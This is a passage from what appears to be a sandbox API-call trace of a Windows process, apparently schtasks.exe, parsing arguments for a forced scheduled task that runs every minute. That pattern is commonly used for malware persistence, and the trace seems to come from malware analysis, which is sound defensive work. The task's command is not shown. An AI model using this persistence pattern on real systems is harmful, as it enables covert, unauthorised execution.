returned 0 [0212.537] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0212.537] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.537] lstrlenW (lpString="|u|") returned 3 [0212.537] lstrlenW (lpString="|sc|") returned 4 [0212.537] RtlRestoreLastWin32Error () returned 0x490 [0212.537] lstrlenW (lpString="p") returned 1 [0212.537] lstrlenW (lpString="p") returned 1 [0212.537] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.537] lstrlenW (lpString="sc") returned 2 [0212.537] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.537] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0212.537] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.537] lstrlenW (lpString="|p|") returned 3 [0212.537] lstrlenW (lpString="|sc|") returned 4 [0212.537] RtlRestoreLastWin32Error () returned 0x490 [0212.537] lstrlenW (lpString="ru") returned 2 [0212.537] lstrlenW (lpString="ru") returned 2 [0212.537] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.537] lstrlenW (lpString="sc") returned 2 [0212.537] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.538] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0212.538] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.538] lstrlenW (lpString="|ru|") returned 4 [0212.538] lstrlenW (lpString="|sc|") returned 4 [0212.538] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0212.538] RtlRestoreLastWin32Error () returned 0x490 [0212.538] lstrlenW (lpString="rp") returned 2 [0212.538] lstrlenW (lpString="rp") returned 2 [0212.538] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.538] lstrlenW (lpString="sc") returned 2 [0212.538] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.538] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0212.538] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.538] lstrlenW (lpString="|rp|") returned 4 [0212.538] lstrlenW (lpString="|sc|") returned 4 [0212.538] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0212.538] RtlRestoreLastWin32Error () returned 0x490 [0212.538] lstrlenW (lpString="sc") returned 2 [0212.538] lstrlenW (lpString="sc") returned 2 [0212.538] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.538] lstrlenW (lpString="sc") returned 2 [0212.538] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.538] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.538] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.538] lstrlenW (lpString="|sc|") returned 4 [0212.539] lstrlenW (lpString="|sc|") returned 4 [0212.539] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0212.539] RtlRestoreLastWin32Error () returned 0x0 [0212.539] RtlRestoreLastWin32Error () returned 0x0 [0212.539] lstrlenW (lpString="minute") returned 6 [0212.539] lstrlenW (lpString="-/") returned 2 [0212.539] StrChrIW (lpStart="-/", wMatch=0x463006d) returned 0x0 [0212.539] RtlRestoreLastWin32Error () returned 0x490 [0212.539] RtlRestoreLastWin32Error () returned 0x490 [0212.539] RtlRestoreLastWin32Error () returned 0x0 [0212.539] lstrlenW (lpString="minute") returned 6 [0212.539] StrChrIW (lpStart="minute", wMatch=0x3a) returned 0x0 [0212.539] RtlRestoreLastWin32Error () returned 0x490 [0212.539] RtlRestoreLastWin32Error () returned 0x0 [0212.539] _memicmp (_Buf1=0x1baba0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.539] lstrlenW (lpString="minute") returned 6 [0212.539] lstrlenW (lpString="minute") returned 6 [0212.539] lstrlenW (lpString=" \x09") returned 2 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0212.539] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0212.539] GetLastError () returned 0x0 [0212.540] lstrlenW (lpString="minute") returned 6 [0212.540] lstrlenW (lpString="minute") returned 6 [0212.540] RtlRestoreLastWin32Error () returned 0x0 [0212.540] RtlRestoreLastWin32Error () returned 0x0 [0212.540] lstrlenW (lpString="/mo") returned 3 [0212.540] lstrlenW (lpString="-/") returned 2 [0212.540] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.540] lstrlenW (lpString="create") returned 6 [0212.540] lstrlenW (lpString="create") returned 6 [0212.540] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.540] lstrlenW (lpString="mo") returned 2 [0212.540] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.540] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.540] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.540] lstrlenW (lpString="|create|") returned 8 [0212.540] lstrlenW (lpString="|mo|") returned 4 [0212.540] StrStrIW (lpFirst="|create|", lpSrch="|mo|") returned 0x0 [0212.540] RtlRestoreLastWin32Error () returned 0x490 [0212.542] lstrlenW (lpString="?") returned 1 [0212.542] lstrlenW (lpString="?") returned 1 [0212.542] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] lstrlenW (lpString="mo") returned 2 [0212.543] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0212.543] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.543] lstrlenW (lpString="|?|") returned 3 [0212.543] lstrlenW (lpString="|mo|") returned 4 [0212.543] RtlRestoreLastWin32Error () returned 0x490 [0212.543] lstrlenW (lpString="s") returned 1 [0212.543] lstrlenW (lpString="s") returned 1 [0212.543] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] lstrlenW (lpString="mo") returned 2 [0212.543] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0212.543] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.543] lstrlenW (lpString="|s|") returned 3 [0212.543] lstrlenW (lpString="|mo|") returned 4 [0212.543] RtlRestoreLastWin32Error () returned 0x490 [0212.543] lstrlenW (lpString="u") returned 1 [0212.543] lstrlenW (lpString="u") returned 1 [0212.543] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] lstrlenW (lpString="mo") returned 2 [0212.543] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.543] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0212.544] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.544] lstrlenW (lpString="|u|") returned 3 [0212.544] lstrlenW (lpString="|mo|") returned 4 [0212.544] RtlRestoreLastWin32Error () returned 0x490 [0212.544] lstrlenW (lpString="p") returned 1 [0212.544] lstrlenW (lpString="p") returned 1 [0212.544] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.544] lstrlenW (lpString="mo") returned 2 [0212.544] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.544] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0212.544] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.544] lstrlenW (lpString="|p|") returned 3 [0212.544] lstrlenW (lpString="|mo|") returned 4 [0212.544] RtlRestoreLastWin32Error () returned 0x490 [0212.544] lstrlenW (lpString="ru") returned 2 [0212.544] lstrlenW (lpString="ru") returned 2 [0212.544] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.544] lstrlenW (lpString="mo") returned 2 [0212.544] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.544] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0212.544] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.544] lstrlenW (lpString="|ru|") returned 4 [0212.544] lstrlenW (lpString="|mo|") returned 4 [0212.544] StrStrIW (lpFirst="|ru|", lpSrch="|mo|") returned 0x0 [0212.544] RtlRestoreLastWin32Error () returned 0x490 [0212.545] lstrlenW (lpString="rp") returned 2 [0212.545] lstrlenW (lpString="rp") returned 2 [0212.545] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.545] lstrlenW (lpString="mo") returned 2 [0212.545] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.545] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0212.545] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.545] lstrlenW (lpString="|rp|") returned 4 [0212.545] lstrlenW (lpString="|mo|") returned 4 [0212.545] StrStrIW (lpFirst="|rp|", lpSrch="|mo|") returned 0x0 [0212.545] RtlRestoreLastWin32Error () returned 0x490 [0212.545] lstrlenW (lpString="sc") returned 2 [0212.545] lstrlenW (lpString="sc") returned 2 [0212.545] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.545] lstrlenW (lpString="mo") returned 2 [0212.545] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.545] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.545] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.545] lstrlenW (lpString="|sc|") returned 4 [0212.545] lstrlenW (lpString="|mo|") returned 4 [0212.545] StrStrIW (lpFirst="|sc|", lpSrch="|mo|") returned 0x0 [0212.546] RtlRestoreLastWin32Error () returned 0x490 [0212.546] lstrlenW (lpString="mo") returned 2 [0212.546] lstrlenW (lpString="mo") returned 2 [0212.546] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.546] lstrlenW (lpString="mo") returned 2 [0212.546] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.546] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.546] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.546] lstrlenW (lpString="|mo|") returned 4 [0212.546] lstrlenW (lpString="|mo|") returned 4 [0212.546] StrStrIW (lpFirst="|mo|", lpSrch="|mo|") returned="|mo|" [0212.546] RtlRestoreLastWin32Error () returned 0x0 [0212.546] RtlRestoreLastWin32Error () returned 0x0 [0212.546] lstrlenW (lpString="1") returned 1 [0212.546] RtlRestoreLastWin32Error () returned 0x490 [0212.546] RtlRestoreLastWin32Error () returned 0x0 [0212.546] lstrlenW (lpString="1") returned 1 [0212.546] StrChrIW (lpStart="1", wMatch=0x3a) returned 0x0 [0212.546] RtlRestoreLastWin32Error () returned 0x490 [0212.546] RtlRestoreLastWin32Error () returned 0x0 [0212.546] _memicmp (_Buf1=0x1baba0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.546] lstrlenW (lpString="1") returned 1 [0212.546] lstrlenW (lpString="1") returned 1 [0212.546] lstrlenW (lpString=" \x09") returned 2 [0212.546] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0212.546] StrChrW (lpStart=" \x09", wMatch=0x31) returned 0x0 [0212.546] GetLastError () returned 0x0 [0212.547] lstrlenW (lpString="1") returned 1 [0212.547] lstrlenW (lpString="1") returned 1 [0212.547] GetProcessHeap () returned 0x1b0000 [0212.547] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0xc, Size=0x4) returned 0x1b6cb8 [0212.547] RtlRestoreLastWin32Error () returned 0x0 [0212.547] RtlRestoreLastWin32Error () returned 0x0 [0212.547] lstrlenW (lpString="/F") returned 2 [0212.547] lstrlenW (lpString="-/") returned 2 [0212.547] StrChrIW (lpStart="-/", wMatch=0x463002f) returned="/" [0212.547] lstrlenW (lpString="create") returned 6 [0212.547] lstrlenW (lpString="create") returned 6 [0212.547] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.547] lstrlenW (lpString="F") returned 1 [0212.547] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.547] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0212.547] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.547] lstrlenW (lpString="|create|") returned 8 [0212.547] lstrlenW (lpString="|F|") returned 3 [0212.547] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0212.547] RtlRestoreLastWin32Error () returned 0x490 [0212.548] lstrlenW (lpString="?") returned 1 [0212.548] lstrlenW (lpString="?") returned 1 [0212.548] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.548] lstrlenW (lpString="F") returned 1 [0212.548] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.548] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0212.548] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.548] lstrlenW (lpString="|?|") returned 3 [0212.548] lstrlenW (lpString="|F|") returned 3 [0212.548] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0212.548] RtlRestoreLastWin32Error () returned 0x490 [0212.548] lstrlenW (lpString="s") returned 1 [0212.548] lstrlenW (lpString="s") returned 1 [0212.548] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.548] lstrlenW (lpString="F") returned 1 [0212.548] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.548] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0212.548] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.548] lstrlenW (lpString="|s|") returned 3 [0212.549] lstrlenW (lpString="|F|") returned 3 [0212.549] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0212.549] RtlRestoreLastWin32Error () returned 0x490 [0212.549] lstrlenW (lpString="u") returned 1 [0212.549] lstrlenW (lpString="u") returned 1 [0212.549] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.549] lstrlenW (lpString="F") returned 1 [0212.549] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.549] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0212.550] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.550] lstrlenW (lpString="|u|") returned 3 [0212.550] lstrlenW (lpString="|F|") returned 3 [0212.550] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0212.550] RtlRestoreLastWin32Error () returned 0x490 [0212.550] lstrlenW (lpString="p") returned 1 [0212.550] lstrlenW (lpString="p") returned 1 [0212.550] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.550] lstrlenW (lpString="F") returned 1 [0212.551] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.551] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0212.551] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.551] lstrlenW (lpString="|p|") returned 3 [0212.551] lstrlenW (lpString="|F|") returned 3 [0212.551] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0212.551] RtlRestoreLastWin32Error () returned 0x490 [0212.551] lstrlenW (lpString="ru") returned 2 [0212.551] lstrlenW (lpString="ru") returned 2 [0212.551] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.551] lstrlenW (lpString="F") returned 1 [0212.551] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.551] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0212.551] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.551] lstrlenW (lpString="|ru|") returned 4 [0212.551] lstrlenW (lpString="|F|") returned 3 [0212.551] StrStrIW (lpFirst="|ru|", lpSrch="|F|") returned 0x0 [0212.551] RtlRestoreLastWin32Error () returned 0x490 [0212.551] lstrlenW (lpString="rp") returned 2 [0212.551] lstrlenW (lpString="rp") returned 2 [0212.551] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.552] lstrlenW (lpString="F") returned 1 [0212.552] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.552] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0212.552] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.552] lstrlenW (lpString="|rp|") returned 4 [0212.552] lstrlenW (lpString="|F|") returned 3 [0212.552] StrStrIW (lpFirst="|rp|", lpSrch="|F|") returned 0x0 [0212.552] RtlRestoreLastWin32Error () returned 0x490 [0212.552] lstrlenW (lpString="sc") returned 2 [0212.552] lstrlenW (lpString="sc") returned 2 [0212.552] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.552] lstrlenW (lpString="F") returned 1 [0212.552] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.552] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0212.552] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.552] lstrlenW (lpString="|sc|") returned 4 [0212.552] lstrlenW (lpString="|F|") returned 3 [0212.555] StrStrIW (lpFirst="|sc|", lpSrch="|F|") returned 0x0 [0212.555] RtlRestoreLastWin32Error () returned 0x490 [0212.555] lstrlenW (lpString="mo") returned 2 [0212.555] lstrlenW (lpString="mo") returned 2 [0212.556] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.556] lstrlenW (lpString="F") returned 1 [0212.556] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.556] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0212.556] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.556] lstrlenW (lpString="|mo|") returned 4 [0212.556] lstrlenW (lpString="|F|") returned 3 [0212.556] StrStrIW (lpFirst="|mo|", lpSrch="|F|") returned 0x0 [0212.556] RtlRestoreLastWin32Error () returned 0x490 [0212.556] lstrlenW (lpString="d") returned 1 [0212.556] lstrlenW (lpString="d") returned 1 [0212.556] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.556] lstrlenW (lpString="F") returned 1 [0212.556] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.556] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0212.556] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.556] lstrlenW (lpString="|d|") returned 3 [0212.558] lstrlenW (lpString="|F|") returned 3 [0212.558] StrStrIW (lpFirst="|d|", lpSrch="|F|") returned 0x0 [0212.559] RtlRestoreLastWin32Error () returned 0x490 [0212.559] lstrlenW (lpString="m") returned 1 [0212.559] lstrlenW (lpString="m") returned 1 [0212.559] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.559] lstrlenW (lpString="F") returned 1 [0212.559] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.559] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0212.559] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.559] lstrlenW (lpString="|m|") returned 3 [0212.559] lstrlenW (lpString="|F|") returned 3 [0212.559] StrStrIW (lpFirst="|m|", lpSrch="|F|") returned 0x0 [0212.559] RtlRestoreLastWin32Error () returned 0x490 [0212.559] lstrlenW (lpString="i") returned 1 [0212.559] lstrlenW (lpString="i") returned 1 [0212.560] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.560] lstrlenW (lpString="F") returned 1 [0212.560] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.560] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0212.560] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.560] lstrlenW (lpString="|i|") returned 3 [0212.560] lstrlenW (lpString="|F|") returned 3 [0212.560] StrStrIW (lpFirst="|i|", lpSrch="|F|") returned 0x0 [0212.560] RtlRestoreLastWin32Error () returned 0x490 [0212.560] lstrlenW (lpString="tn") returned 2 [0212.560] lstrlenW (lpString="tn") returned 2 [0212.560] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.560] lstrlenW (lpString="F") returned 1 [0212.560] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.560] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0212.560] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.560] lstrlenW (lpString="|tn|") returned 4 [0212.560] lstrlenW (lpString="|F|") returned 3 [0212.560] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0212.560] RtlRestoreLastWin32Error () returned 0x490 [0212.560] lstrlenW (lpString="tr") returned 2 [0212.560] lstrlenW (lpString="tr") returned 2 [0212.560] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.560] lstrlenW (lpString="F") returned 1 [0212.561] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.561] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0212.561] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.561] lstrlenW (lpString="|tr|") returned 4 [0212.561] lstrlenW (lpString="|F|") returned 3 [0212.561] StrStrIW (lpFirst="|tr|", lpSrch="|F|") returned 0x0 [0212.561] RtlRestoreLastWin32Error () returned 0x490 [0212.561] lstrlenW (lpString="st") returned 2 [0212.561] lstrlenW (lpString="st") returned 2 [0212.561] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.561] lstrlenW (lpString="F") returned 1 [0212.561] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.561] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4 [0212.561] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.561] lstrlenW (lpString="|st|") returned 4 [0212.561] lstrlenW (lpString="|F|") returned 3 [0212.561] StrStrIW (lpFirst="|st|", lpSrch="|F|") returned 0x0 [0212.561] RtlRestoreLastWin32Error () returned 0x490 [0212.561] lstrlenW (lpString="sd") returned 2 [0212.561] lstrlenW (lpString="sd") returned 2 [0212.562] _memicmp (_Buf1=0x1b7528, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.562] lstrlenW (lpString="F") returned 1 [0212.562] _memicmp (_Buf1=0x1b74c8, _Buf2=0x3a2708, _Size=0x7) returned 0 [0212.562] _vsnwprintf (in: _Buffer=0x1b9730, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4 [0212.562] _vsnwprintf (in: _Buffer=0x1b96b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|F|") returned 3 [0212.562] lstrlenW 